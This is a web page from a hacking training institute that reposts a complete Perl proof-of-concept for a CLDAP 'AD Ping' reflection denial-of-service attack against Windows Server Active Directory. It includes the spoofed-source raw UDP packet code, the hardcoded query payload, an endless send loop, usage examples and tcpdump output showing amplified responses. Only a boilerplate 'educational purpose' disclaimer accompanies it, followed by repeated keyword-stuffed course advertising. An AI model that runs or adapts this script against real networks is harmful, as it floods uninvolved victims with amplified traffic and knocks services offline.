Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credit: Todor Donev
#!/usr/bin/perl## MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon # (CLDAP "AD Ping") query reflection DoS PoC### MS Windows Server 2016 [NOT TESTED !!!]# # Description:# The attacker sends a simple query to a vulnerable reflector # supporting the Connectionless LDAP service (CLDAP) and using # address spoofing makes it appear to originate from the intended # victim. The CLDAP service responds to the spoofed address, # sending unwanted network traffic to the attacker’s intended target.# # Amplification techniques allow bad actors to intensify the size # of their attacks, because the responses generated by the LDAP # servers are much larger than the attacker’s queries. In this case, # the LDAP service responses are capable of reaching very high # bandwidth and we have seen an average amplification factor of # 46x and a peak of 55x.### Disclaimer:# This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact# that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility.## Use at your own risk and educational# purpose ONLY!## See also, UDP-based Amplification Attacks:### # perl cldapdrdos.pl 192.168.1.112 192.168.1.146# [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC# [ ======# [ Usg: cldapdrdos.pl <ldap server> <target> <port># [ Default port: 389# [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1# [ Sending CLDAP "AD Ping" packets..# # tcpdump -i eth0 -c4 port 389# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes# 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57# 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...# 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57# 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...# 4 packets captured# 6 packets received by filter# 0 packets dropped by kernel### use Net::RawIP; print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";print "[ ======\n";print "[ Usg: $0 <ldap server> <target> <port>\n";print "[ Default port: 389\n";print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";print "[ ======\n"; my $cldap = $ARGV[0];my $target = $ARGV[1];my $port = $ARGV[2] || '389'; die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535); my $query = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";$query .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";$query .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";$query .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";$query .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";$query .= "\x65\x74\x6c\x6f\x67\x6f\x6e"; my $sock = new Net::RawIP({ udp => {} }) or die;print "[ Sending CLDAP \"AD Ping\" packets..\n";while () { select(undef, undef, undef, 0.40); # Sleep 400 milliseconds $sock->set({ ip => { saddr => $target, daddr => $cldap}, udp => { source => 31337, dest => $port, data => $query} }); $sock->send;}www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India